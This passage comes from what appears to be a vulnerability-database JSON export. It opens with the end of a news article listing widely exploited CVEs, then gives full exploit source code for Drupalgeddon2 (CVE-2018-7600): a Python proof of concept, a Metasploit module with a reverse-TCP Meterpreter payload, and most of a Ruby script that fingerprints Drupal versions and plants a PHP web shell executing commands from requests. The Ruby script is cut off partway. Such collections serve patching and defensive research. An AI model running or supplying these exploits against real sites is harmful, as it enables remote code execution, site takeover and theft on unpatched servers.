9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): 
[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "href": "", "sourceData": "#!/usr/bin/env\nimport sys\nimport requests\n\nprint ('################################################################')\nprint ('# Proof-Of-Concept for CVE-2018-7600')\nprint ('# by Vitalii Rudnykh')\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\nprint ('# https://github.com/a2u/CVE-2018-7600')\nprint ('################################################################')\nprint ('Provided only for educational or information purposes\\n')\n\ntarget = input('Enter target url (example: https://domain.ltd/): 
')\n\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\n# set verify = False if your proxy certificate is self signed\n# remember to set proxies both for http and https\n# \n# example:\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n# verify = False\nproxies = {}\nverify = True\n\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\n\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\ncheck = requests.get(target + 'hello.txt')\nif check.status_code != 200:\n sys.exit(\"Not exploitable\")\nprint ('\\nCheck: '+target+'hello.txt')", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-17T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "EXPLOITPACK:E563140BD918794B55F61FC55941120F", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n \n include Msf::Exploit::Remote::HttpClient\n \n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupalgeddon2',\n 'Description' => %q{\n CVE-2018-7600 / SA-CORE-2018-002\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n allows remote attackers to execute arbitrary code because of an issue affecting\n multiple subsystems with default or common module configurations.\n\n The module can load msf PHP arch payloads, using the php/base64 encoder.\n\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Vitalii Rudnykh', # initial PoC\n 'Hans Topo', # further research and ruby port\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\n ],\n 'References' =>\n [\n ['SA-CORE', '2018-002'],\n ['CVE', '2018-7600'],\n ],\n 'DefaultOptions' =>\n {\n 'encoder' => 'php/base64',\n 'payload' => 'php/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => [ARCH_PHP],\n 'Targets' =>\n [\n ['User register form with exec', {}],\n ],\n 'DisclosureDate' => 'Apr 15 2018',\n 'DefaultTarget' => 0\n ))\n \n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\n ])\n \n register_advanced_options(\n [\n\n ])\n end\n \n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def exploit_user_register\n data = Rex::MIME::Message.new\n data.add_part(\"php -r 
'#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\n post_data = data.to_s\n\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{uri_path}user/register\",\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data,\n 'vars_get' => {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => '1',\n '_wrapper_format' => 'drupal_ajax',\n }\n })\n end\n \n ##\n # Main\n ##\n \n def exploit\n case datastore['TARGET']\n when 0\n exploit_user_register\n else\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\n end\n end\n end", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "href": "", "sourceData": "#!/usr/bin/env ruby\n#\n# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\n#\n# Authors:\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\n#\n\n\nrequire 'base64'\nrequire 'json'\nrequire 'net/http'\nrequire 'openssl'\nrequire 'readline'\nrequire 'highline/import'\n\n\n# Settings - Try to write a PHP to the web root?\ntry_phpshell = true\n# Settings - General/Stealth\n$useragent = \"drupalgeddon2\"\nwebshell = \"shell.php\"\n# Settings - Proxy information (nil to disable)\n$proxy_addr = nil\n$proxy_port = 8080\n\n\n# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Function http_request <url> [type] [data]\ndef http_request(url, type=\"get\", payload=\"\", cookie=\"\")\n puts verbose(\"HTTP - URL : #{url}\") if $verbose\n puts verbose(\"HTTP - Type: #{type}\") if $verbose\n puts verbose(\"HTTP - Data: #{payload}\") if not payload.empty? and $verbose\n\n begin\n uri = URI(url)\n request = type =~ /get/? 
Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\n request.body = payload if not payload.empty?\n return $http.request(request)\n rescue SocketError\n puts error(\"Network connectivity issue\")\n rescue Errno::ECONNREFUSED => e\n puts error(\"The target is down ~ #{e.message}\")\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\n rescue Timeout::Error => e\n puts error(\"The target timed out ~ #{e.message}\")\n end\n\n # If we got here, something went wrong.\n exit\nend\n\n\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\n puts info(\"Payload: #{evil}\") if not shell\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? and $verbose\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\n\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n # Check the version to match the payload\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + 
\"&timezone[a][#lazy_builder][][]=\" + evil\n\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\n\n elsif $drupalverion.start_with?(\"7\") and element == \"name\"\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n end\n\n # Drupal v7.x needs an extra value from a form\n if $drupalverion.start_with?(\"7\")\n response = http_request(url, \"post\", payload, $session_cookie)\n\n form_name = \"form_build_id\"\n puts verbose(\"Form name : #{form_name}\") if $verbose\n\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\n puts warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\n puts verbose(\"Form value : #{form_value}\") if $verbose\n\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\n payload = \"#{form_name}=#{form_value}\"\n end\n\n return url, payload\nend\n\n\n# Function clean_result <input>\ndef clean_result(input)\n #result = JSON.pretty_generate(JSON[response.body])\n #result = $drupalverion.start_with?(\"8\")? 
JSON.parse(clean)[0][\"data\"] : clean\n clean = input.to_s.strip\n\n # PHP function: passthru\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\n\n # PHP function: exec\n # For: [{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"<payload>\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n #clean.slice!(/\\[{\"command\":\".*data\":\"/)\n #clean.slice!(/\\\\u003Cspan class=\\\\u0022.*}\\]$/)\n\n # Newer PHP for an older Drupal\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n #clean.slice!(/<b>.*<br \\/>/)\n\n # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n clean.slice!(/The website encountered an unexpected error.*/)\n\n return clean\nend\n\n\n# Feedback when something goes right\ndef success(text)\n # Green\n return \"\\e[#{32}m[+]\\e[0m #{text}\"\nend\n\n# Feedback when something goes wrong\ndef error(text)\n # Red\n return \"\\e[#{31}m[-]\\e[0m #{text}\"\nend\n\n# Feedback when something may have issues\ndef warning(text)\n # Yellow\n return \"\\e[#{33}m[!]\\e[0m #{text}\"\nend\n\n# Feedback when something doing something\ndef action(text)\n # Blue\n return \"\\e[#{34}m[*]\\e[0m #{text}\"\nend\n\n# Feedback with helpful information\ndef info(text)\n # Light blue\n return \"\\e[#{94}m[i]\\e[0m #{text}\"\nend\n\n# Feedback for the overkill\ndef verbose(text)\n # Dark grey\n return \"\\e[#{90}m[v]\\e[0m #{text}\"\nend\n\n\n# - - - - - - - - - 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef init_authentication()\n $uname = ask('Enter your username: ') { |q| q.echo = false }\n $passwd = ask('Enter your password: ') { |q| q.echo = false }\n $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true }\n $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true }\n $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true }\n $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true }\nend\n\ndef is_arg(args, param)\n args.each do |arg|\n if arg == param\n return true\n end\n end\n return false\nend\n\n\n# Quick how to use\ndef usage()\n puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'\n puts 'Example for target that does not require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com'\n puts 'Example for target that does require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com --authentication'\nend\n\n\n# Read in values\nif ARGV.empty?\n usage()\n exit\nend\n\n$target = ARGV[0]\ninit_authentication() if is_arg(ARGV, '--authentication')\n$verbose = is_arg(ARGV, '--verbose')\n\n\n# Check input for protocol\n$target = \"http://#{$target}\" if not $target.start_with?(\"http\")\n# Check input for the end\n$target += \"/\" if not $target.end_with?(\"/\")\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Banner\nputs action(\"--==[::#Drupalggedon2::]==--\")\nputs \"-\"*80\nputs info(\"Target : #{$target}\")\nputs info(\"Proxy : #{$proxy_addr}:#{$proxy_port}\") if $proxy_addr\nputs info(\"Write? 
: Skipping writing PHP web shell\") if not try_phpshell\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Setup connection\nuri = URI($target)\n$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)\n\n# Use SSL/TLS if needed\nif uri.scheme == \"https\"\n $http.use_ssl = true\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\nend\n\n$session_cookie = ''\n# If authentication required then login and get session cookie\nif $uname\n $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix\n response = http_request($target + $login_path, 'post', $payload, $session_cookie)\n if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']\n $session_cookie = response['set-cookie'].split('; ')[0]\n puts success(\"Logged in - Session Cookie : #{$session_cookie}\")\n end\n\nend\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Try and get version\n$drupalverion = \"\"\n\n# Possible URLs\nurl = [\n # --- changelog ---\n # Drupal v6.x / v7.x [200]\n $target + \"CHANGELOG.txt\",\n # Drupal v8.x [200]\n $target + \"core/CHANGELOG.txt\",\n\n # --- bootstrap ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/bootstrap.inc\",\n # Drupal v8.x [403]\n $target + \"core/includes/bootstrap.inc\",\n\n # --- database ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/database.inc\",\n # Drupal v7.x [403]\n #$target + \"includes/database/database.inc\",\n # Drupal v8.x [403]\n #$target + \"core/includes/database.inc\",\n\n # --- landing page ---\n # Drupal v8.x / v7.x [200]\n $target,\n]\n\n# Check all\nurl.each do|uri|\n # Check response\n response = http_request(uri, 'get', '', $session_cookie)\n\n # Check header\n if response['X-Generator'] and $drupalverion.empty?\n header = response['X-Generator'].slice(/Drupal (.*) \\(https:\\/\\/www.drupal.org\\)/, 1).to_s.strip\n\n if not 
header.empty?\n $drupalverion = \"#{header}.x\" if $drupalverion.empty?\n puts success(\"Header : v#{header} [X-Generator]\")\n puts verbose(\"X-Generator: #{response['X-Generator']}\") if $verbose\n end\n end\n\n # Check request response, valid\n if response.code == \"200\"\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n # Check to see if it says: The requested URL \"http://<URL>\" was not found on this server.\n puts warning(\"WARNING: Could be a false-positive [1-1], as the file could be reported to be missing\") if response.body.downcase.include? \"was not found on this server\"\n\n # Check to see if it says: <h1 class=\"js-quickedit-page-title title page-title\">Page not found</h1> <div class=\"content\">The requested page could not be found.</div>\n puts warning(\"WARNING: Could be a false-positive [1-2], as the file could be reported to be missing\") if response.body.downcase.include? \"the requested page could not be found\"\n\n # Only works for CHANGELOG.txt\n if uri.match(/CHANGELOG.txt/)\n # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x\n puts warning(\"WARNING: Unable to detect keyword 'drupal.org'\") if not response.body.downcase.include? \"drupal.org\"\n\n # Patched already? (For Drupal v8.4.x / v7.x)\n puts warning(\"WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\") if response.body.include? 
\"SA-CORE-2018-002\"\n\n # Try and get version from the file contents (For Drupal v8.4.x / v7.x)\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\n\n # Blank if not valid\n $drupalverion = \"\" if not $drupalverion[-1] =~ /\\d/\n end\n\n # Check meta tag\n if not response.body.empty?\n # For Drupal v8.x / v7.x\n meta = response.body.match(/<meta name=\"Generator\" content=\"Drupal (.*) /)\n metatag = meta.to_s.slice(/meta name=\"Generator\" content=\"Drupal (.*) \\(http/, 1).to_s.strip\n\n if not metatag.empty?\n $drupalverion = \"#{metatag}.x\" if $drupalverion.empty?\n puts success(\"Metatag: v#{$drupalverion} [Generator]\")\n puts verbose(meta.to_s) if $verbose\n end\n end\n\n # Done! ...if a full known version, else keep going... may get lucky later!\n break if not $drupalverion.end_with?(\"x\") and not $drupalverion.empty?\n end\n\n # Check request response, not allowed\n if response.code == \"403\" and $drupalverion.empty?\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v.7.x/v6.x)\n $drupalverion = uri.match(/includes\\/database.inc/)? \"7.x/6.x\" : \"\" if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v8.x)\n $drupalverion = uri.match(/core/)? \"8.x\" : \"\" if $drupalverion.empty?\n\n # If we got something, show it!\n puts success(\"URL : v#{$drupalverion}?\") if not $drupalverion.empty?\n end\n\n else\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts warning(\"MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}\")\n end\nend\n\n\n# Feedback\nif not $drupalverion.empty?\n status = $drupalverion.end_with?(\"x\")? 
\"?\" : \"!\"\n puts success(\"Drupal#{status}: v#{$drupalverion}\")\nelse\n puts error(\"Didn't detect Drupal version\")\n exit\nend\n\nif not $drupalverion.start_with?(\"8\") and not $drupalverion.start_with?(\"7\")\n puts error(\"Unsupported Drupal version (#{$drupalverion})\")\n exit\nend\nputs \"-\"*80\n\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n\n# The attack vector to use\n$form = $drupalverion.start_with?(\"8\")? \"user/register\" : \"user/password\"\n\n# Make a request, check for form\nurl = \"#{$target}?q=#{$form}\"\nputs action(\"Testing: Form (#{$form})\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Form valid\")\nelsif response['location']\n puts error(\"Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}\")\n exit\nelsif response.code == \"404\"\n puts error(\"Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?\")\n exit\nelsif response.code == \"403\"\n puts error(\"Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?\")\n exit\nelsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\nelse\n puts warning(\"WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})\")\nend\n\n\nputs \"- \"*40\n\n\n# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register\n# Drupal v7.x needs it anyway\n$clean_url = $drupalverion.start_with?(\"8\")? 
